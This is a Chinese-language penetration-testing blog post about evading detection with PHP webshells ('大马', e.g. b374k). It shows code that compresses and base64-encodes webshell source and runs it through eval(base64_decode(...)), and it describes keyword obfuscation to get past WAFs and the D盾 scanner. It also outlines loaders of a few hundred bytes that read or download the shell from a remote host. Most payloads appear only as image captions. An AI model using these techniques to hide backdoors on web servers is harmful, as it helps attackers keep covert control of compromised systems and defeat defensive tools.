1. 首页
  2. 渗透测试

PHP免杀大马的奇淫技巧

Part 1

常见PHP大马:

PHP免杀大马的奇淫技巧

PHP免杀大马的奇淫技巧

Part 2

大马后门检查: Fiddler 抓包

PHP免杀大马的奇淫技巧

审计代码

这里我以http://webshell8.com/ 这里的大马为例子演示

修改并运行脚本 PHP免杀大马的奇淫技巧

Burp抓包或者右键查看原代码 PHP免杀大马的奇淫技巧

修改并运行代码 PHP免杀大马的奇淫技巧

再使用Burp抓个包 PHP免杀大马的奇淫技巧

查找关键字GetHtml hmlogin localhostPHP免杀大马的奇淫技巧

把上图的base64代码解密下 PHP免杀大马的奇淫技巧

Part 3

大马源码免杀

这里我使用的是国外的一款大马b374k来进行免杀。 PHP免杀大马的奇淫技巧

执行代码 evalpreg_replace的/e修饰符来执行大马代码。 PHP免杀大马的奇淫技巧

$a = 'phpinfo();';
eval($a);
//eval执行php代码

 

编码

如果直接去执行代码,是过不了waf的,我们一般需要将大马源码进行编码。 PHP免杀大马的奇淫技巧

$code= file_get_contents('D:\phpStudy\WWW\Test\Zlib\help.txt'); //大马源码路径
$encode = base64_encode(gzdeflate($code));  //加密函数自己修改就行
echo $encode; //输出加密后代码

 

在线加解密码 点这里

这里我先将b374k的源码去掉<?php ?>后,base64加密 PHP免杀大马的奇淫技巧

解码

通过解码执行我们的代码。 PHP免杀大马的奇淫技巧

那我们来试试解码并执行刚刚base64加密的大马。

<?php
eval(base64_decode('刚刚加密的代码'));
?>

 

PHP免杀大马的奇淫技巧

关键字免杀

// 类型这样的关键字如果没有混淆拆分是过不了waf的
eval(base64_decode('code'));
// 我们需要做的就是关键字免杀

 

免杀 payload 1 过狗过D盾 注意: code就是我们刚刚加密的base64代码。 PHP免杀大马的奇淫技巧

免杀 PHP免杀大马的奇淫技巧

D盾规则库 PHP免杀大马的奇淫技巧

免杀 payload 2 PHP免杀大马的奇淫技巧 PHP免杀大马的奇淫技巧

总结,源码免杀就到这里了,其实只需要些php基础,轻松免杀。

Part 4

只有几百字节的大马

首先我们需要了解,几百字节是什么概念 1kb = 1024b PHP免杀大马的奇淫技巧

那么我们怎么实现呢,2种思路远程读取远程下载 PHP免杀大马的奇淫技巧

远程读取 payload 3 PHP免杀大马的奇淫技巧

上传txt PHP免杀大马的奇淫技巧

免杀 PHP免杀大马的奇淫技巧

payload 4 PHP免杀大马的奇淫技巧

免杀 PHP免杀大马的奇淫技巧

远程下载 payload 5 PHP免杀大马的奇淫技巧

免杀 PHP免杀大马的奇淫技巧

大小最小的一百多字节,其他2个两百多字节那样子。

原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er

发表评论

电子邮件地址不会被公开。 必填项已用*标注

联系我们

在线咨询:点击这里给我发消息

QR code